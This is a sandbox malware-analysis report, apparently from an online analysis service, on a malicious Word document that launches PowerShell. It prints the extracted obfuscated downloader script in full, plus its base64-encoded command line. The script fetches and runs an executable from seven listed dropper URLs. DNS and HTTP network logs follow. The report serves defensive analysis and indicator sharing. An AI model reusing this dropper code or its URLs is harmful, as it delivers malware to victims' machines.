Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

eed25d6d5c...18.doc

windows7-x64

10

eed25d6d5c...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    100s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/09/2024, 01:34 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc

  • Size

    195KB

  • MD5

    eed25d6d5c363dc12cf924abd1f315c4

  • SHA1

    ac3947373ab41e0ed8d52dd1d3e09c8660edf7b3

  • SHA256

    d0b4b470d5e523a36a9751cec3eb8c5e1fae85904ab8637b745f1aebea3aa8cd

  • SHA512

    27982f80f90b2be909823ede19f114c6dcd92dd85ccaf8ab740c1ca2907ba2d67bb6c6bcd18c01d231eefcae8c877070913643e3fc12c641a0b9c83594035eec

  • SSDEEP

    1536:2rdi1Ir77zOH98Wj2gpngh+a9Z8ul8oPhEPmRl6VOE4j:2rfrzOH98ipgd8ul8uWP+l6VOE4j

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$U34kjyd=('Aq'+('u'+'haa')+'l');&('new-'+'ite'+'m') $eNv:UsERpRofiLe\m7bi4OC\QkrH2ZK\ -itemtype dirEcTORy;[Net.ServicePointManager]::"SE`CURIt`yPr`OT`ocOL" = (('tl'+'s')+('12, '+'t')+('ls1'+'1,')+(' '+'tls'));$A8gumy9 = (('Fhdn'+'s')+'u');$B09ldvd=(('Iw'+'w3')+'v'+'6y');$Mbb9ock=$env:userprofile+(('WS'+('xM'+'7')+('bi4'+'o')+('c'+'WS')+('x'+'Qkrh2'+'z')+('kW'+'Sx')) -rEPlacE ('WS'+'x'),[ChAR]92)+$A8gumy9+('.e'+'xe');$V3ghm67=('P'+('0'+'n0')+('t'+'v8'));$Cudjllw=.('ne'+'w-objec'+'t') NeT.WEBcLIEnT;$Yk9vdgu=(('https:'+'/')+('/vst'+'bar')+('.com'+'/'+'w')+'p'+'-'+('ad'+'m'+'in/')+('H'+'s/'+'*ht')+'t'+'p:'+('/'+'/bi')+('n'+'arywebt'+'e')+('chso'+'lu')+('tio'+'ns.c'+'o')+'m/'+('mobile'+'-we'+'b'+'s')+('it'+'e')+('-'+'desig')+('ning'+'-c'+'o')+'mp'+('an'+'y'+'-in-')+('gu'+'rg')+('ao'+'n/CL')+('Z'+'/*ht')+'t'+('p'+'://sha'+'hq')+'ut'+'ub'+'u'+'d'+'di'+'n.'+'o'+'r'+'g/'+'U'+'/'+'*h'+'t'+('tp'+':/')+('/cybers'+'ig')+('n-'+'001-si'+'te'+'5.gt'+'e')+'m'+'p'+('u'+'rl')+('.co'+'m')+'/'+('2x'+'wzq')+('/bve'+'/*')+('ht'+'tp')+('s:'+'/')+'/s'+('ta'+'r-'+'spee')+'d'+'.v'+'i'+('p/'+'wp-')+('admi'+'n')+'/'+'T'+('t'+'v/*h'+'ttp')+'s'+':/'+('/'+'tr')+'e'+('ne'+'g')+'.c'+('om.b'+'r/'+'rf')+('vm'+'bh'+'/a/*ht')+'tp'+'s'+':/'+('/cim'+'s')+('jr.'+'c')+('om/'+'h')+'os'+'p'+'it'+('al/x'+'2'+'f/'))."SP`Lit"([char]42);$Fk1mmn_=('Y'+'1'+('hvp'+'j2'));foreach($Tfyvjt3 in $Yk9vdgu){try{$Cudjllw."D`OW`NL`oadFILE"($Tfyvjt3, $Mbb9ock);$Oakwmmf=('B'+('4'+'zf')+('he'+'h'));If ((&('Get-I'+'t'+'em') $Mbb9ock)."lEnG`TH" -ge 35233) {&('Inv'+'oke'+'-Item')($Mbb9ock);$Ntkfm7q=('W'+'kx'+('xk'+'1n'));break;$Dptll27=(('Mj'+'t')+('y'+'5c5'))}}catch{}}$L871qdi=('V'+'4'+('qct'+'v3'))
URLs
exe.dropper

https://vstbar.com/wp-admin/Hs/
exe.dropper

http://binarywebtechsolutions.com/mobile-website-designing-company-in-gurgaon/CLZ/
exe.dropper

http://shahqutubuddin.org/U/
exe.dropper

http://cybersign-001-site5.gtempurl.com/2xwzq/bve/
exe.dropper

https://star-speed.vip/wp-admin/Ttv/
exe.dropper

https://treneg.com.br/rfvmbh/a/
exe.dropper

https://cimsjr.com/hospital/x2f/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eed25d6d5c363dc12cf924abd1f315c4_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2016
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -en JABVADMANABrAGoAeQBkAD0AKAAnAEEAcQAnACsAKAAnAHUAJwArACcAaABhAGEAJwApACsAJwBsACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAFIAbwBmAGkATABlAFwAbQA3AGIAaQA0AE8AQwBcAFEAawByAEgAMgBaAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQBSAEkAdABgAHkAUAByAGAATwBUAGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACgAJwAxADIALAAgACcAKwAnAHQAJwApACsAKAAnAGwAcwAxACcAKwAnADEALAAnACkAKwAoACcAIAAnACsAJwB0AGwAcwAnACkAKQA7ACQAQQA4AGcAdQBtAHkAOQAgAD0AIAAoACgAJwBGAGgAZABuACcAKwAnAHMAJwApACsAJwB1ACcAKQA7ACQAQgAwADkAbABkAHYAZAA9ACgAKAAnAEkAdwAnACsAJwB3ADMAJwApACsAJwB2ACcAKwAnADYAeQAnACkAOwAkAE0AYgBiADkAbwBjAGsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVwBTACcAKwAoACcAeABNACcAKwAnADcAJwApACsAKAAnAGIAaQA0ACcAKwAnAG8AJwApACsAKAAnAGMAJwArACcAVwBTACcAKQArACgAJwB4ACcAKwAnAFEAawByAGgAMgAnACsAJwB6ACcAKQArACgAJwBrAFcAJwArACcAUwB4ACcAKQApACAALQByAEUAUABsAGEAYwBFACAAIAAoACcAVwBTACcAKwAnAHgAJwApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAEEAOABnAHUAbQB5ADkAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFYAMwBnAGgAbQA2ADcAPQAoACcAUAAnACsAKAAnADAAJwArACcAbgAwACcAKQArACgAJwB0ACcAKwAnAHYAOAAnACkAKQA7ACQAQwB1AGQAagBsAGwAdwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQAWQBrADkAdgBkAGcAdQA9ACgAKAAnAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AdgBzAHQAJwArACcAYgBhAHIAJwApACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkACcAKwAnAG0AJwArACcAaQBuAC8AJwApACsAKAAnAEgAJwArACcAcwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwADoAJwArACgAJwAvACcAKwAnAC8AYgBpACcAKQArACgAJwBuACcAKwAnAGEAcgB5AHcAZQBiAHQAJwArACcAZQAnACkAKwAoACcAYwBoAHMAbwAnACsAJwBsAHUAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAKAAnAG0AbwBiAGkAbABlACcAKwAnAC0AdwBlACcAKwAnAGIAJwArACcAcwAnACkAKwAoACcAaQB0ACcAKwAnAGUAJwApACsAKAAnAC0AJwArACcAZABlAHMAaQBnACcAKQArACgAJwBuAGkAbgBnACcAKwAnAC0AYwAnACsAJwBvACcAKQArACcAbQBwACcAKwAoACcAYQBuACcAKwAnAHkAJwArACcALQBpAG4ALQAnACkAKwAoACcAZwB1ACcAKwAnAHIAZwAnACkAKwAoACcAYQBvACcAKwAnAG4ALwBDAEwAJwApACsAKAAnAFoAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAaABhACcAKwAnAGgAcQAnACkAKwAnAHUAdAAnACsAJwB1AGIAJwArACcAdQAnACsAJwBkACcAKwAnAGQAaQAnACsAJwBuAC4AJwArACcAbwAnACsAJwByACcAKwAnAGcALwAnACsAJwBVACcAKwAnAC8AJwArACcAKgBoACcAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGMAeQBiAGUAcgBzACcAKwAnAGkAZwAnACkAKwAoACcAbgAtACcAKwAnADAAMAAxAC0AcwBpACcAKwAnAHQAZQAnACsAJwA1AC4AZwB0ACcAKwAnAGUAJwApACsAJwBtACcAKwAnAHAAJwArACgAJwB1ACcAKwAnAHIAbAAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACgAJwAyAHgAJwArACcAdwB6AHEAJwApACsAKAAnAC8AYgB2AGUAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAnAC8AcwAnACsAKAAnAHQAYQAnACsAJwByAC0AJwArACcAcwBwAGUAZQAnACkAKwAnAGQAJwArACcALgB2ACcAKwAnAGkAJwArACgAJwBwAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGEAZABtAGkAJwArACcAbgAnACkAKwAnAC8AJwArACcAVAAnACsAKAAnAHQAJwArACcAdgAvACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAoACcALwAnACsAJwB0AHIAJwApACsAJwBlACcAKwAoACcAbgBlACcAKwAnAGcAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALgBiACcAKwAnAHIALwAnACsAJwByAGYAJwApACsAKAAnAHYAbQAnACsAJwBiAGgAJwArACcALwBhAC8AKgBoAHQAJwApACsAJwB0AHAAJwArACcAcwAnACsAJwA6AC8AJwArACgAJwAvAGMAaQBtACcAKwAnAHMAJwApACsAKAAnAGoAcgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGgAJwApACsAJwBvAHMAJwArACcAcAAnACsAJwBpAHQAJwArACgAJwBhAGwALwB4ACcAKwAnADIAJwArACcAZgAvACcAKQApAC4AIgBTAFAAYABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAawAxAG0AbQBuAF8APQAoACcAWQAnACsAJwAxACcAKwAoACcAaAB2AHAAJwArACcAagAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABmAHkAdgBqAHQAMwAgAGkAbgAgACQAWQBrADkAdgBkAGcAdQApAHsAdAByAHkAewAkAEMAdQBkAGoAbABsAHcALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABGAEkATABFACIAKAAkAFQAZgB5AHYAagB0ADMALAAgACQATQBiAGIAOQBvAGMAawApADsAJABPAGEAawB3AG0AbQBmAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnAHoAZgAnACkAKwAoACcAaABlACcAKwAnAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQATQBiAGIAOQBvAGMAawApAC4AIgBsAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMANQAyADMAMwApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABNAGIAYgA5AG8AYwBrACkAOwAkAE4AdABrAGYAbQA3AHEAPQAoACcAVwAnACsAJwBrAHgAJwArACgAJwB4AGsAJwArACcAMQBuACcAKQApADsAYgByAGUAYQBrADsAJABEAHAAdABsAGwAMgA3AD0AKAAoACcATQBqACcAKwAnAHQAJwApACsAKAAnAHkAJwArACcANQBjADUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAOAA3ADEAcQBkAGkAPQAoACcAVgAnACsAJwA0ACcAKwAoACcAcQBjAHQAJwArACcAdgAzACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4532

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    neu-azsc-000.roaming.officeapps.live.com
    neu-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    IN A
    52.109.76.243
  • flag-ie
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    WINWORD.EXE
    Remote address:
    52.109.76.243:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_514
    X-OfficeVersion: 16.0.18115.30577
    X-OfficeCluster: neu-000.roaming.officeapps.live.com
    X-CorrelationId: 189a1169-6e92-43dc-be1a-f638b73e60b9
    X-Powered-By: ASP.NET
    Date: Sat, 21 Sep 2024 01:34:30 GMT
    Content-Length: 654
  • flag-us
    DNS
    97.32.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.32.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    243.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    243.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    67.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    vstbar.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    vstbar.com
    IN A
    Response
  • flag-us
    DNS
    binarywebtechsolutions.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    binarywebtechsolutions.com
    IN A
    Response
  • flag-us
    DNS
    shahqutubuddin.org
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    shahqutubuddin.org
    IN A
    Response
  • flag-us
    DNS
    cybersign-001-site5.gtempurl.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    cybersign-001-site5.gtempurl.com
    IN A
    Response
  • flag-us
    DNS
    star-speed.vip
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    star-speed.vip
    IN A
    Response
  • flag-us
    DNS
    treneg.com.br
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    treneg.com.br
    IN A
    Response
  • flag-us
    DNS
    cimsjr.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    cimsjr.com
    IN A
    Response
    cimsjr.com
    IN A
    65.99.205.160
  • flag-us
    DNS
    105.193.132.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.193.132.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    metadata.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    metadata.templates.cdn.office.net
    IN A
    Response
    metadata.templates.cdn.office.net
    IN CNAME
    templatesmetadata.office.net
    templatesmetadata.office.net
    IN CNAME
    templatesmetadata.office.net.edgekey.net
    templatesmetadata.office.net.edgekey.net
    IN CNAME
    e26769.dscb.akamaiedge.net
    e26769.dscb.akamaiedge.net
    IN A
    2.18.27.153
    e26769.dscb.akamaiedge.net
    IN A
    2.18.27.146
  • flag-gb
    GET
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    WINWORD.EXE
    Remote address:
    2.18.27.153:443
    Request
    GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: metadata.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Type: text/xml
    Server: Kestrel
    Content-Encoding: gzip
    Content-Length: 1264
    Cache-Control: max-age=35006
    Date: Sat, 21 Sep 2024 01:34:46 GMT
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-us
    DNS
    binaries.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    binaries.templates.cdn.office.net
    IN A
    Response
    binaries.templates.cdn.office.net
    IN CNAME
    binaries.templates.cdn.office.net.edgesuite.net
    binaries.templates.cdn.office.net.edgesuite.net
    IN CNAME
    a1847.dscg2.akamai.net
    a1847.dscg2.akamai.net
    IN A
    173.222.211.24
    a1847.dscg2.akamai.net
    IN A
    173.222.211.57
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02835233.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 46413
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
    Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
    ETag: 0x8D36AC879BBB45C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:46 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02851227.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31471
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: karb7EFxz6gpK2GEkvXvNA==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC8848A0495
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:46 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02851216.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 34816
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: YoYxJM3NoTXswOcieCy4iA==
    Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
    ETag: 0x8D36AC8813CE0D3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 01a9fe93-e01e-0020-0397-a0f18d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:46 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02851218.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31835
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC881E66CE5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:48 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02851219.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31605
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC8822FFB6E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:47 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02851220.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31482
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
    Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
    ETag: 0x8D36AC8827914A7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d704013f-301e-015e-1697-a09fc7000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:46 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-gb
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    WINWORD.EXE
    Remote address:
    173.222.211.24:443
    Request
    GET /support/templates/en-us/tp02851221.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: D5A26C3F-7F9C-411F-BC37-56D3DEC3B8DD
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31562
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
    Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
    ETag: 0x8D36AC882C4ED43
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 21 Sep 2024 01:34:48 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
